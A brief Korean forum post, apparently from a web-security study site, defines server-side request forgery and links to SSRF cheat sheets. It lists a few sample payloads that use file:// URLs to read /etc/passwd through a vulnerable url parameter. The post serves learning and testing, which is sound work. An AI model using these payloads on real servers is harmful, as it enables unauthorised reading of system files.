정보실

웹학교

정보실

기타 SSRF - Server-Side Request Forgery

본문

https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit 

SSRF bible. Cheatsheet



https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery 

서버 측 요청 위조 또는 SSRF는 공격자가 서버를 대신하여 요청을 수행하도록 하는 취약점입니다.


file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd


  • 트위터로 보내기
  • 페이스북으로 보내기
  • 구글플러스로 보내기
  • 카카오톡으로 보내기

페이지 정보

조회 25회 ]  작성일19-12-10 20:44

웹학교